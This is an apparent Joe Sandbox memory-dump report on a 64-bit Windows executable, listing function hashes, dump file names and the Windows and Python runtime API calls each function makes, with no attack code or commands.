                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BA219232A19A81C7DB61AF18D440379B6A0FBC4B54F144276E79DC76D9DF3DD8129B00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                • Instruction ID: f78d964dd6abb8bc6e64e550407cd9b5443691011ad7adfcb03fa73bb2ce5525
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F801C831A09741C1E544FF529900069E695BF85FE0F4846B2DE9C93BE6CE3CD5136310
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,?,00000000,00007FF6AAE3B32A,?,?,?,00007FF6AAE34F11,?,?,?,?,00007FF6AAE3A48A), ref: 00007FF6AAE3EBED
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocHeap
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4292702814-0
                                                                                                                                                                                                                                • Opcode ID: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                                                                                                                                                • Instruction ID: d51e6a0a7d2cfe21a71e037b417bbe03f5def5768c909041cfc425410657ee29
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 80F0F974B0B247C1FE6A766698552B992D57F88B80F4C55B2C94FC63E1EE1CE4836230
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(?,?,?,00007FF6AAE30C90,?,?,?,00007FF6AAE322FA,?,?,?,?,?,00007FF6AAE33AE9), ref: 00007FF6AAE3D63A
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocHeap
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4292702814-0
                                                                                                                                                                                                                                • Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                • Instruction ID: d4c2057a39d9e271c64cd06b362230614237ef26fcb8dab0663a00d5e17e2e6c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B2F03A30A0A243C1FE553672588127891A46F847A0F080AB3D97EC52E1DE2DE482A520
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6AAE264CF,?,00007FF6AAE2336E), ref: 00007FF6AAE25840
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6AAE264CF,?,00007FF6AAE2336E), ref: 00007FF6AAE25852
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6AAE264CF,?,00007FF6AAE2336E), ref: 00007FF6AAE25889
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6AAE264CF,?,00007FF6AAE2336E), ref: 00007FF6AAE2589B
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6AAE264CF,?,00007FF6AAE2336E), ref: 00007FF6AAE258B4
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6AAE264CF,?,00007FF6AAE2336E), ref: 00007FF6AAE258C6
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6AAE264CF,?,00007FF6AAE2336E), ref: 00007FF6AAE258DF
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6AAE264CF,?,00007FF6AAE2336E), ref: 00007FF6AAE258F1
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6AAE264CF,?,00007FF6AAE2336E), ref: 00007FF6AAE2590D
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6AAE264CF,?,00007FF6AAE2336E), ref: 00007FF6AAE2591F
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6AAE264CF,?,00007FF6AAE2336E), ref: 00007FF6AAE2593B
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6AAE264CF,?,00007FF6AAE2336E), ref: 00007FF6AAE2594D
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6AAE264CF,?,00007FF6AAE2336E), ref: 00007FF6AAE25969
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6AAE264CF,?,00007FF6AAE2336E), ref: 00007FF6AAE2597B
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6AAE264CF,?,00007FF6AAE2336E), ref: 00007FF6AAE25997
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6AAE264CF,?,00007FF6AAE2336E), ref: 00007FF6AAE259A9
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6AAE264CF,?,00007FF6AAE2336E), ref: 00007FF6AAE259C5
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6AAE264CF,?,00007FF6AAE2336E), ref: 00007FF6AAE259D7
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                • API String ID: 199729137-653951865
                                                                                                                                                                                                                                • Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                • Instruction ID: f2d60b259fa3c38d4d33c042e543fd26aa3785afdab5758b2c9ecb7bf0cad834
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1522B370A0BB07D2FA56BF65A82457523A8BF48746F4554FBC41E82260FF7EB04BB210
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,00007FF6AAE28919,00007FF6AAE23F9D), ref: 00007FF6AAE2842B
                                                                                                                                                                                                                                • RemoveDirectoryW.KERNEL32(?,00007FF6AAE28919,00007FF6AAE23F9D), ref: 00007FF6AAE284AE
                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?,00007FF6AAE28919,00007FF6AAE23F9D), ref: 00007FF6AAE284CD
                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(?,00007FF6AAE28919,00007FF6AAE23F9D), ref: 00007FF6AAE284DB
                                                                                                                                                                                                                                • FindClose.KERNEL32(?,00007FF6AAE28919,00007FF6AAE23F9D), ref: 00007FF6AAE284EC
                                                                                                                                                                                                                                • RemoveDirectoryW.KERNEL32(?,00007FF6AAE28919,00007FF6AAE23F9D), ref: 00007FF6AAE284F5
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                • String ID: %s\*
                                                                                                                                                                                                                                • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                • Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                • Instruction ID: 23c5310b11881e24e4e6afc2cb52b3d17275fed3a047c743c7373b3fa5a1b0be
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C413031A0E683C6EE20BF64E4541BA6364FB94754F4402B3DA9DC2694EF3DD54B9740
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3140674995-0
                                                                                                                                                                                                                                • Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                • Instruction ID: af5cd6a2e31153b05192f2bcb66a57c9daf87a74bb6dac02355991e94c09ce5c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 45313B72609B81CAEB609F64E8803EE6364FB84704F04407ADA4E87B94DF39D549D714
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1239891234-0
                                                                                                                                                                                                                                • Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                • Instruction ID: 9398c5f8e63f91439e77fe37059021460508afa35ffd84b28b754ab8074a1ebf
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0831A332609F81C6EB20DF25E8802AE73A4FB88754F500176EA8D83B64DF3DC156DB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2227656907-0
                                                                                                                                                                                                                                • Opcode ID: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                                                                                                                                                                                                • Instruction ID: 4dd003f0a9baa62e57c314d9085a4eb1b44ae41356aae1f0d02034da04ccfd10
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5CB1D632B5A682C2EE61EB22D5002B9A394FB44BE4F445173DE5D87BD5DE3DE442E300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                                                • Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                • Instruction ID: d28618a25a012f596ca3d2cf085b3191555745482efe7a2e7bac65cd18ea3175
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B9111832B15B06CAEB00AF74E8542A933A4FB59758F440E32DA6D867A4DF78D15A9340
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: HeapProcess
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 54951025-0
                                                                                                                                                                                                                                • Opcode ID: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
                                                                                                                                                                                                                                • Instruction ID: 89cb05569adc25b4a0a10658124d44056c1e0fdda4457e3094dbb4c7b1c13f9e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 31B09230E07A42C3EA083B296C8221822A87F48700F9801BAC21C80330DE2C20E66700
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
                                                                                                                                                                                                                                • Instruction ID: 8cb02b084e6cee51e95885c335ded50841bd13a536c2d3507b122ca7a6f30cd0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EBF06871B19296CBDB98AF69A80262977D0F7083C0F50D47AD69DC3B04DE3CD4529F04
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
                                                                                                                                                                                                                                • Instruction ID: 8dbf95821b81a88aff2851fe39c328b7f857da536a61039257f9d4035a6f6694
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
